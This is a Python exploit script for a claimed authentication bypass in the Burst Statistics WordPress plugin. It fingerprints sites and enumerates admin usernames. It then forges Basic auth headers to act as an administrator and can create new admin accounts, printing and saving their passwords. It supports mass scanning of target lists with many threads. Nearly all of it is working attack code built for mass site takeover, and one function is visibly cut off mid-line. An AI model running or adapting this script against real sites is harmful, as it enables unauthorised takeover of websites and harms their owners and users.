#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2026-8181 - Burst Statistics 3.4.0-3.4.1.1 Authentication Bypass to Admin Account Takeover Vulnerability: Authentication Bypass in is_mainwp_authenticated() method Affected: Burst Statistics WordPress Plugin versions 3.4.0 - 3.4.1.1 CVSS: 9.8 (Critical) Type: Unauthenticated Root Cause: In class-mainwp-proxy.php, the is_mainwp_authenticated() method calls wp_authenticate_application_password(null, $username, $password). On HTTP sites (where wp_is_application_passwords_available() returns false), this function returns null instead of WP_Error. The subsequent check `is_wp_error(null)` evaluates to false, causing the code to fall through and authenticate based solely on the username via get_user_by('login', $username), without validating the password. The has_admin_access() method in trait-admin-helper.php is called during plugins_loaded (class-burst.php line 118), which fires BEFORE REST API route processing. This means wp_set_current_user() grants admin privileges for the ENTIRE request, allowing access to any WordPress REST endpoint. Attack Flow: 1. Attacker sends request with X-BURSTMAINWP: 1 header and Authorization: Basic 2. During plugins_loaded, Burst's has_admin_access() is called 3. is_mainwp_authenticated() bypasses auth (null != WP_Error) 4. wp_set_current_user() switches to admin user 5. Attacker has full WordPress admin privileges for the request 6. Can create new admin users, modify settings, install plugins, etc. Usage: python3 CVE-2026-8181.py -u [-U ] [-o results.txt] python3 CVE-2026-8181.py -f targets.txt [-j 10] [--output-dir ./out] python3 CVE-2026-8181.py -f targets.txt -o combined.txt """ import argparse import base64 import json import os import random import string import sys import threading import urllib3 from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urlparse _stdout_lock = threading.Lock() _combined_results_lock = threading.Lock() def _sync_print(*args, **kwargs): with _stdout_lock: print(*args, **kwargs) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: import requests except ImportError: print("[!] requests library required: pip3 install requests") sys.exit(1) def format_results_text(doc, target_base): """Plain-text block for one target (Username / Password / ...).""" target_base = target_base.rstrip("/") new_admin = doc.get("new_admin_user") login_addr = f"{target_base}/wp-admin/" if isinstance(new_admin, dict) and new_admin.get("username"): username = new_admin["username"] password = new_admin["password"] email = new_admin["email"] user_id = new_admin["id"] else: username = password = email = "" user_id = "" if doc.get("success"): username = doc.get("bypass_username") or "" bp = doc.get("bypass_payload") if isinstance(bp, dict): email = bp.get("email") or "" _id = bp.get("id") if _id is not None: user_id = _id lines = [ f"Username: {username}", f"Password: {password}", f"Email: {email}", f"User ID: {user_id}", f"Login Address: {login_addr}", ] if doc.get("failure_reason"): lines.append("") lines.append(f"Note: {doc['failure_reason']}") elif doc.get("create_user_requested") and not ( isinstance(new_admin, dict) and new_admin.get("username") ): lines.append("") lines.append("Note: New admin account was not created.") return "\n".join(lines) + "\n" BANNER = """ +----------------------------------------------------------------+ | CVE-2026-8181 - Burst Statistics Auth Bypass PoC | | Affected: 3.4.0 - 3.4.1.1 | Severity: CRITICAL (9.8) | | Type: Unauthenticated Admin Account Takeover | +----------------------------------------------------------------+ """ def print_creator_credit(): """Console credit for this PoC build.""" _sync_print("") _sync_print(" [+] Created: Mürrez ") _sync_print(' [~] Multi-Thread CVE-2026-8181 Exploit ') _sync_print("") class BurstExploit: def __init__( self, target_url, admin_username="admin", verify_ssl=False, timeout=15, output_path=None, log_prefix="", combined_output_path=None, save_failed_to_disk=True, ): self.target = target_url.rstrip("/") self.admin_user = admin_username self.verify = verify_ssl self.timeout = timeout self.output_path = output_path self.log_prefix = log_prefix or "" self.combined_output_path = combined_output_path self.save_failed_to_disk = save_failed_to_disk self.session = requests.Session() self.session.verify = verify_ssl self.session.headers.update({ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" }) def log(self, level, msg): colors = {"info": "\033[94m", "ok": "\033[92m", "warn": "\033[93m", "fail": "\033[91m", "end": "\033[0m"} prefix = {"info": "[*]", "ok": "[+]", "warn": "[!]", "fail": "[-]"} line = f"{colors.get(level, '')}{prefix.get(level, '[?]')} {self.log_prefix}{msg}{colors['end']}" _sync_print(line) def write_results_file(self, doc): """Write plain-text summary to output_path and/or append to combined_output_path.""" success = doc.get("success") text = format_results_text(doc, self.target) if self.output_path and (self.save_failed_to_disk or success): try: with open(self.output_path, "w", encoding="utf-8") as f: f.write(text) self.log("ok", f"Results written to {self.output_path}") except OSError as e: self.log("fail", f"Could not write results file: {e}") if self.combined_output_path and success: try: block = f"===== {self.target} =====\n{text}\n" with _combined_results_lock: with open(self.combined_output_path, "a", encoding="utf-8") as f: f.write(block) except OSError as e: self.log("fail", f"Could not append combined results file: {e}") def get_rest_url(self, route): """Build REST API URL, trying both pretty permalinks and fallback.""" return f"{self.target}/wp-json{route}" def get_rest_url_fallback(self, route): return f"{self.target}/?rest_route={route}" def rest_request(self, method, route, headers=None, data=None): """Make a REST API request, trying pretty permalinks first, then fallback.""" urls = [self.get_rest_url(route), self.get_rest_url_fallback(route)] for url in urls: try: resp = self.session.request( method, url, headers=headers, json=data, timeout=self.timeout, allow_redirects=True ) try: resp.json() return resp except (json.JSONDecodeError, ValueError): if "rest_route" not in url: continue return resp except requests.RequestException: continue return None def build_bypass_headers(self, username=None): """Construct headers that trigger the authentication bypass.""" user = username or self.admin_user fake_creds = base64.b64encode(f"{user}:bypass_CVE-2026-8181".encode()).decode() return { "X-BURSTMAINWP": "1", "Authorization": f"Basic {fake_creds}", "Content-Type": "application/json", } def check_wordpress(self): """Verify the target is running WordPress.""" self.log("info", f"Checking if {self.target} is WordPress...") try: resp = self.session.get(self.target, timeout=self.timeout) indicators = ["wp-content", "wp-includes", "wordpress", "wp-json"] for ind in indicators: if ind in resp.text.lower(): self.log("ok", "WordPress detected") return True resp2 = self.rest_request("GET", "/wp/v2/") if resp2 and resp2.status_code == 200: self.log("ok", "WordPress REST API accessible") return True except requests.RequestException: pass self.log("warn", "Could not confirm WordPress installation") return False def check_burst_statistics(self): """Check if Burst Statistics is installed and detect version.""" self.log("info", "Checking for Burst Statistics plugin...") version = None try: resp = self.session.get( f"{self.target}/wp-content/plugins/burst-statistics/readme.txt", timeout=self.timeout ) if resp.status_code == 200 and "burst" in resp.text.lower(): for line in resp.text.split("\n"): if "stable tag:" in line.lower(): version = line.split(":")[-1].strip() break except requests.RequestException: pass if not version: try: resp = self.session.get(self.target, timeout=self.timeout) if "burst-statistics" in resp.text: self.log("ok", "Burst Statistics detected (version unknown)") return "unknown" except requests.RequestException: pass if version: self.log("ok", f"Burst Statistics version: {version}") vuln_versions = ["3.4.0", "3.4.1", "3.4.1.1"] if version in vuln_versions: self.log("ok", f"Version {version} is VULNERABLE!") return version else: self.log("warn", f"Version {version} may not be vulnerable (affected: 3.4.0-3.4.1.1)") return version else: self.log("warn", "Burst Statistics not detected") return None def enumerate_users(self): """Attempt to enumerate WordPress admin usernames.""" self.log("info", "Enumerating admin usernames...") usernames = [] resp = self.rest_request("GET", "/wp/v2/users") if resp and resp.status_code == 200: try: users = resp.json() if isinstance(users, list): for u in users: slug = u.get("slug", "") if slug: usernames.append(slug) self.log("ok", f"Found user: {slug} (ID: {u.get('id')})") except (json.JSONDecodeError, ValueError): pass if not usernames: for i in range(1, 6): try: resp = self.session.get( f"{self.target}/?author={i}", timeout=self.timeout, allow_redirects=False ) if resp.status_code in [301, 302]: location = resp.headers.get("Location", "") if "/author/" in location: username = location.rstrip("/").split("/author/")[-1] usernames.append(username) self.log("ok", f"Found user via author enum: {username}") except requests.RequestException: continue if not usernames: usernames = [self.admin_user] self.log("warn", f"Could not enumerate users, using default: {self.admin_user}") return usernames def test_auth_bypass(self, username): """Test if the authentication bypass works for a given username.""" self.log("info", f"Testing auth bypass with username: {username}") headers = self.build_bypass_headers(username) resp = self.rest_request("GET", "/wp/v2/users/me?context=edit", headers=headers) if resp and resp.status_code == 200: try: data = resp.json() if "id" in data and data.get("id", 0) > 0: self.log("ok", f"AUTH BYPASS SUCCESSFUL! Authenticated as: {data.get('name', username)} (ID: {data['id']})") self.log("ok", f"Email: {data.get('email', 'N/A')}") roles = data.get("roles", []) self.log("ok", f"Roles: {', '.join(roles)}") return data except (json.JSONDecodeError, ValueError): pass resp2 = self.rest_request("POST", "/burst/v1/mainwp-auth", headers=headers, data={}) if resp2 and resp2.status_code == 200: try: data = resp2.json() if "token" in data: self.log("ok", "AUTH BYPASS SUCCESSFUL via mainwp-auth endpoint!") self.log("ok", f"Application Password Token obtained: {data['token'][:20]}...") return {"token": data["token"], "bypass": True} except (json.JSONDecodeError, ValueError): pass if resp: self.log("fail", f"Auth bypass failed (HTTP {resp.status_code})") try: err = resp.json() self.log("fail", f"Error: {err.get('message', err.get('code', 'unknown'))}") except (json.JSONDecodeError, ValueError): pass else: self.log("fail", "No response from server") return None def create_admin_user(self, username): """Create a new WordPress administrator account via the bypass.""" new_user = "burst_" + "".join(random.choices(string.ascii_lowercase, k=6)) new_pass = "".join(random.choices(string.ascii_letters + string.digits + "!@#$%", k=16)) new_email = f"{new_user}@protonmail.com" self.log("info", f"Creating new admin account: {new_user}") headers = self.build_bypass_headers(username) payload = { "username": new_user, "password": new_pass, "email": new_email, "roles": ["administrator"], "name": new_user, } resp = self.rest_request("POST", "/wp/v2/users", headers=headers, data=payload) if resp and resp.status_code in [200, 201]: try: data = resp.json() if "id" in data: self.log("ok", "=" * 50) self.log("ok", "NEW ADMIN ACCOUNT CREATED SUCCESSFULLY!") self.log("ok", f" Username: {new_user}") self.log("ok", f" Password: {new_pass}") self.log("ok", f" Email: {new_email}") self.log("ok", f" User ID: {data['id']}") self.log("ok", f" Login: {self.target}/wp-admin/") self.log("ok", "=" * 50) return {"username": new_user, "password": new_pass, "email": new_email, "id": data["id"]} except (json.JSONDecodeError, ValueError): pass if resp: self.log("fail", f"Failed to create admin user (HTTP {resp.status_code})") try: err = resp.json() self.log("fail", f"Error: {err.get('message', 'unknown')}") except (json.JSONDecodeError, ValueError): if "Protected" in resp.text or " 0 def main(): parser = argparse.ArgumentParser( description="CVE-2026-8181 - Burst Statistics Authentication Bypass PoC", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: %(prog)s -u http://target.com %(prog)s -u http://target.com -U admin --create-user -o result.txt %(prog)s -f targets.txt -j 20 --output-dir ./results -k %(prog)s -f targets.txt -j 50 -o all-results.txt --create-user -k %(prog)s -u https://target.com -U administrator -k """ ) tgt = parser.add_mutually_exclusive_group(required=True) tgt.add_argument("-u", "--url", help="Single target WordPress base URL") tgt.add_argument( "-f", "--targets-file", metavar="FILE", help="Multi-target: text file with one URL/host per line (# comments OK)", ) parser.add_argument("-U", "--username", default="admin", help="Admin username (default: admin)") parser.add_argument("--create-user", action="store_true", help="Create a new admin account") parser.add_argument( "-o", "--output", metavar="FILE", help="Write plain-text results: with -u one file; with -f append all targets into one FILE", ) parser.add_argument( "--output-dir", metavar="DIR", help="Multi-target (-f): one .txt per host (optional; not with -o)", ) parser.add_argument( "-j", "--threads", type=int, default=10, metavar="N", help="Multi-target: concurrent workers (default: 10, max: 200)", ) parser.add_argument("-k", "--insecure", action="store_true", help="Skip SSL verification") parser.add_argument("-t", "--timeout", type=int, default=15, help="Request timeout in seconds") args = parser.parse_args() if args.targets_file: if args.output and args.output_dir: parser.error("With -f, use either -o (single combined file) or --output-dir (per host), not both") ok = run_multi_target(args) sys.exit(0 if ok else 1) if args.output_dir: parser.error("--output-dir is only for multi-target mode (-f)") exploit = BurstExploit( target_url=args.url, admin_username=args.username, verify_ssl=not args.insecure, timeout=args.timeout, output_path=args.output, ) result = exploit.run(create_user=args.create_user) sys.exit(0 if result else 1) if __name__ == "__main__": main()